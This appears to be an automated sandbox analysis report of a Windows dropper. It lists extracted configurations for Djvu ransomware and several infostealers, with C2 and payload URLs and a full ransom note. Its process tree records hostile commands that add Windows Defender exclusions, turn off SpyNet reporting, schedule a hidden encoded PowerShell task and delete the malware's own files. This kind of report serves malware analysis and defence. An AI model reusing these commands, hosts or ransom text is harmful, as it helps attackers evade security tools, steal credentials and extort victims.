djvu | 69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f

Analysis

max time kernel
115s
max time network
119s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
10-03-2022 03:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f.exe
Size

4.5MB
MD5

1ec8c8f5f9658f3ecce03f47d61ee3f1
SHA1

5ecee360b5d5f416e29f90129b2653503139d021
SHA256

69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f
SHA512

d07caecd5ac141dd96893eef39f5b762a3214fff1ec1d39dc01ab378bf84b9ab71a42182679bb58f642379cec28c78f43ceb3ad2cc17cbe82aaedf32380406cd

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

redline

Botnet

DomAni

varinnitof.xyz:80

Extracted

Family

smokeloader

Version

2020

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32

Extracted

Family

vidar

Version

39.4

Botnet

706

https://sergeevih43.tumblr.com/

Attributes

profile_id
706

Extracted

Family

raccoon

Botnet

a26fbf1c2d0b49bb23b4438deef490ea1c53ab14

Attributes

url4cnc
http://85.159.212.113/maverixsa
http://185.163.204.81/maverixsa
http://194.180.191.33/maverixsa
http://174.138.11.98/maverixsa
http://194.180.191.44/maverixsa
http://91.219.236.120/maverixsa
https://t.me/maverixsa

rc4.plain

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

PRO1203PRO

144.76.173.68:16125

Attributes

auth_value
7a7fbf2ba1c874d2d5050d9184bd1348

Signatures

Detected Djvu ransomware 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/6096-298-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/6096-293-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/6096-290-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3444-200-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/1960-316-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4716-284-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger
behavioral2/memory/4716-283-0x00000000020B0000-0x00000000020F4000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1752-226-0x0000000004900000-0x000000000499D000-memory.dmp	family_vidar
behavioral2/memory/1752-253-0x0000000000400000-0x000000000442E000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libstdc++-6.dll	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 10 IoCs

Processes:

setup_installer.exesetup_install.exesotema_3.exesotema_1.exesotema_7.exesotema_5.exesotema_6.exesotema_8.exesotema_4.exesotema_2.exe

pid	process
688	setup_installer.exe
3788	setup_install.exe
1752	sotema_3.exe
2908	sotema_1.exe
2144	sotema_7.exe
632	sotema_5.exe
1156	sotema_6.exe
1852	sotema_8.exe
1516	sotema_4.exe
3520	sotema_2.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\Tp7LtwUnnQy3yTqGPKzUbVGz.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f.exesetup_installer.exesotema_1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	sotema_1.exe

Loads dropped DLL 5 IoCs

Processes:

setup_install.exe

pid process

3788 setup_install.exe
3788 setup_install.exe
3788 setup_install.exe
3788 setup_install.exe
3788 setup_install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

36 ip-api.com
44 ipinfo.io
45 ipinfo.io
173 ipinfo.io
187 ipinfo.io
188 ipinfo.io
190 ipinfo.io

pid	process
3788	setup_install.exe
3788	setup_install.exe
3788	setup_install.exe
3788	setup_install.exe
3788	setup_install.exe

flow	ioc
36	ip-api.com
44	ipinfo.io
45	ipinfo.io
173	ipinfo.io
187	ipinfo.io
188	ipinfo.io
190	ipinfo.io

Drops file in System32 directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{F55D05CC-A733-4734-B11F-438527834E6F}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{CE0EC774-F021-4157-8308-9D6570EF50B7}.catalogItem	svchost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4540	4244	WerFault.exe	sQ81Y5aFFS7_FxGGwhtu_PyS.exe
2780	4460	WerFault.exe
5356	4576	WerFault.exe	FWHn61xb0EY17rTFzECwXl7F.exe
5348	4596	WerFault.exe	KYY3D3RLqOwVovfNKywDKVuD.exe
5816	1752	WerFault.exe	sotema_3.exe
5984	4244	WerFault.exe	sQ81Y5aFFS7_FxGGwhtu_PyS.exe
6088	4460	WerFault.exe	1xr44gY0mRziBbhYtm5TyWrS.exe
5204	4624	WerFault.exe	_u2YPDc7R57YN4mWvO6aewM1.exe
6060	4296	WerFault.exe	S8PU_lYZMcWrKKVnADIqtoWD.exe
5084	4716	WerFault.exe	vOT_kRGXvyHmLLukibKG86SX.exe
4276	4716	WerFault.exe	vOT_kRGXvyHmLLukibKG86SX.exe
4188	4228	WerFault.exe	UqBuCCe_FFnvvrbEOPvmZZnO.exe
1736	4716	WerFault.exe	vOT_kRGXvyHmLLukibKG86SX.exe
4844	4716	WerFault.exe	vOT_kRGXvyHmLLukibKG86SX.exe
6104	4716	WerFault.exe	vOT_kRGXvyHmLLukibKG86SX.exe
4228	5808	WerFault.exe	kjdyymzg.exe
4580	4624	WerFault.exe	_u2YPDc7R57YN4mWvO6aewM1.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5412 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4764 timeout.exe

pid	process
5412	schtasks.exe

pid	process
4764	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	svchost.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

5564 taskkill.exe
4276 taskkill.exe

pid	process
5564	taskkill.exe
4276	taskkill.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesotema_7.exe

description	pid	process	target process
PID 3440 wrote to memory of 688	3440	69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f.exe	setup_installer.exe
PID 3440 wrote to memory of 688	3440	69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f.exe	setup_installer.exe
PID 3440 wrote to memory of 688	3440	69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f.exe	setup_installer.exe
PID 688 wrote to memory of 3788	688	setup_installer.exe	setup_install.exe
PID 688 wrote to memory of 3788	688	setup_installer.exe	setup_install.exe
PID 688 wrote to memory of 3788	688	setup_installer.exe	setup_install.exe
PID 3788 wrote to memory of 4004	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 4004	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 4004	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 4076	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 4076	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 4076	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 2468	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 2468	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 2468	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 748	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 748	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 748	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 444	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 444	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 444	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 2544	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 2544	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 2544	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 3692	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 3692	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 3692	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 2824	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 2824	3788	setup_install.exe	cmd.exe
PID 3788 wrote to memory of 2824	3788	setup_install.exe	cmd.exe
PID 2468 wrote to memory of 1752	2468	cmd.exe	sotema_3.exe
PID 2468 wrote to memory of 1752	2468	cmd.exe	sotema_3.exe
PID 2468 wrote to memory of 1752	2468	cmd.exe	sotema_3.exe
PID 4004 wrote to memory of 2908	4004	cmd.exe	sotema_1.exe
PID 4004 wrote to memory of 2908	4004	cmd.exe	sotema_1.exe
PID 4004 wrote to memory of 2908	4004	cmd.exe	sotema_1.exe
PID 3692 wrote to memory of 2144	3692	cmd.exe	sotema_7.exe
PID 3692 wrote to memory of 2144	3692	cmd.exe	sotema_7.exe
PID 3692 wrote to memory of 2144	3692	cmd.exe	sotema_7.exe
PID 444 wrote to memory of 632	444	cmd.exe	sotema_5.exe
PID 444 wrote to memory of 632	444	cmd.exe	sotema_5.exe
PID 2544 wrote to memory of 1156	2544	cmd.exe	sotema_6.exe
PID 2544 wrote to memory of 1156	2544	cmd.exe	sotema_6.exe
PID 2544 wrote to memory of 1156	2544	cmd.exe	sotema_6.exe
PID 2824 wrote to memory of 1852	2824	cmd.exe	sotema_8.exe
PID 2824 wrote to memory of 1852	2824	cmd.exe	sotema_8.exe
PID 2824 wrote to memory of 1852	2824	cmd.exe	sotema_8.exe
PID 748 wrote to memory of 1516	748	cmd.exe	sotema_4.exe
PID 748 wrote to memory of 1516	748	cmd.exe	sotema_4.exe
PID 748 wrote to memory of 1516	748	cmd.exe	sotema_4.exe
PID 4076 wrote to memory of 3520	4076	cmd.exe	sotema_2.exe
PID 4076 wrote to memory of 3520	4076	cmd.exe	sotema_2.exe
PID 4076 wrote to memory of 3520	4076	cmd.exe	sotema_2.exe
PID 2144 wrote to memory of 3444	2144	sotema_7.exe	sotema_7.exe
PID 2144 wrote to memory of 3444	2144	sotema_7.exe	sotema_7.exe
PID 2144 wrote to memory of 3444	2144	sotema_7.exe	sotema_7.exe

C:\Users\Admin\AppData\Local\Temp\69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f.exe
"C:\Users\Admin\AppData\Local\Temp\69d82c1d8b501fb0f60d6fe99132091fc73f6a86ad589550df70a4c64164291f.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3440

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:688

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_8.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2824

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_8.exe
sotema_8.exe
5⤵
- Executes dropped EXE
PID:1852

C:\Users\Admin\AppData\Local\Temp\UGloryStp.exe
"C:\Users\Admin\AppData\Local\Temp\UGloryStp.exe"
6⤵
PID:3544

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
6⤵
PID:3136

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:4196

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:5872

C:\Users\Admin\AppData\Local\Temp\lihm.exe
"C:\Users\Admin\AppData\Local\Temp\lihm.exe"
6⤵
PID:2748

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
7⤵
PID:5140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_7.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3692

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_7.exe
sotema_7.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2144

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_7.exe
6⤵
PID:3444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_6.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2544

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_6.exe
sotema_6.exe
5⤵
- Executes dropped EXE
PID:1156

C:\Users\Admin\Documents\sQ81Y5aFFS7_FxGGwhtu_PyS.exe
"C:\Users\Admin\Documents\sQ81Y5aFFS7_FxGGwhtu_PyS.exe"
6⤵
PID:4244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 464
7⤵
- Program crash
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 472
7⤵
- Program crash
PID:5984

C:\Users\Admin\Documents\_u2YPDc7R57YN4mWvO6aewM1.exe
"C:\Users\Admin\Documents\_u2YPDc7R57YN4mWvO6aewM1.exe"
6⤵
PID:4624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 612
7⤵
- Program crash
PID:5204

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
7⤵
PID:2444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 960
7⤵
- Program crash
PID:4580

C:\Users\Admin\Documents\xEVo_u31rHNzpRA7sn1ADVPO.exe
"C:\Users\Admin\Documents\xEVo_u31rHNzpRA7sn1ADVPO.exe"
6⤵
PID:4908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
7⤵
PID:4224

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:1928

C:\Users\Admin\Documents\kGbKT1gl1MEWh8F4gN63XdzD.exe
"C:\Users\Admin\Documents\kGbKT1gl1MEWh8F4gN63XdzD.exe"
6⤵
PID:4948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
7⤵
PID:4528

C:\Windows\system32\mode.com
mode 65,10
8⤵
PID:4700

C:\Users\Admin\Documents\g60svcSug3dXUT6zvl3dBiRl.exe
"C:\Users\Admin\Documents\g60svcSug3dXUT6zvl3dBiRl.exe"
6⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\7zS8303.tmp\Install.exe
.\Install.exe
7⤵
PID:4376

C:\Users\Admin\AppData\Local\Temp\7zS9553.tmp\Install.exe
.\Install.exe /S /site_id "525403"
8⤵
PID:5500

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
9⤵
PID:4984

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
10⤵
PID:2412

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
11⤵
PID:5816

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
9⤵
PID:3732

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
10⤵
PID:4884

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
11⤵
PID:4352

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
11⤵
PID:4392

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gFwiDGyah" /SC once /ST 09:50:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
9⤵
- Creates scheduled task(s)
PID:5412

C:\Users\Admin\Documents\eIwBfFdjeqnJ36U6ZD7Yi86I.exe
"C:\Users\Admin\Documents\eIwBfFdjeqnJ36U6ZD7Yi86I.exe"
6⤵
PID:4880

C:\Users\Admin\Documents\aVBz00pM8eSZ0iZVbb8zgwk9.exe
"C:\Users\Admin\Documents\aVBz00pM8eSZ0iZVbb8zgwk9.exe"
6⤵
PID:4824

C:\Users\Admin\Documents\22pEIXhec2KJ6NO1W8YPqg1N.exe
"C:\Users\Admin\Documents\22pEIXhec2KJ6NO1W8YPqg1N.exe"
6⤵
PID:4724

C:\Users\Admin\Documents\vOT_kRGXvyHmLLukibKG86SX.exe
"C:\Users\Admin\Documents\vOT_kRGXvyHmLLukibKG86SX.exe"
6⤵
PID:4716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 1328
7⤵
- Program crash
PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 852
7⤵
- Program crash
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 1336
7⤵
- Program crash
PID:1736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 1368
7⤵
- Program crash
PID:4844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "vOT_kRGXvyHmLLukibKG86SX.exe" /f & erase "C:\Users\Admin\Documents\vOT_kRGXvyHmLLukibKG86SX.exe" & exit
7⤵
PID:2264

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "vOT_kRGXvyHmLLukibKG86SX.exe" /f
8⤵
- Kills process with taskkill
PID:5564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 1176
7⤵
- Program crash
PID:6104

C:\Users\Admin\Documents\KhzOopO81GDVZz83pzQlfjWF.exe
"C:\Users\Admin\Documents\KhzOopO81GDVZz83pzQlfjWF.exe"
6⤵
PID:4632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im KhzOopO81GDVZz83pzQlfjWF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\KhzOopO81GDVZz83pzQlfjWF.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:4588

C:\Windows\SysWOW64\taskkill.exe
taskkill /im KhzOopO81GDVZz83pzQlfjWF.exe /f
8⤵
- Kills process with taskkill
PID:4276

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:4764

C:\Users\Admin\Documents\ohVVna9Pt7iZJB6iLhKsfMwn.exe
"C:\Users\Admin\Documents\ohVVna9Pt7iZJB6iLhKsfMwn.exe"
6⤵
PID:4616

C:\Users\Admin\Documents\yrsGgcoxIdjgx2MMe6eXJLAe.exe
"C:\Users\Admin\Documents\yrsGgcoxIdjgx2MMe6eXJLAe.exe"
6⤵
PID:4604

C:\Users\Admin\Documents\yrsGgcoxIdjgx2MMe6eXJLAe.exe
"C:\Users\Admin\Documents\yrsGgcoxIdjgx2MMe6eXJLAe.exe"
7⤵
PID:6096

C:\Users\Admin\Documents\KYY3D3RLqOwVovfNKywDKVuD.exe
"C:\Users\Admin\Documents\KYY3D3RLqOwVovfNKywDKVuD.exe"
6⤵
PID:4596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 432
7⤵
- Program crash
PID:5348

C:\Users\Admin\Documents\gR49UkZeutbMRG91METgzOub.exe
"C:\Users\Admin\Documents\gR49UkZeutbMRG91METgzOub.exe"
6⤵
PID:4584

C:\Users\Admin\Documents\FWHn61xb0EY17rTFzECwXl7F.exe
"C:\Users\Admin\Documents\FWHn61xb0EY17rTFzECwXl7F.exe"
6⤵
PID:4576

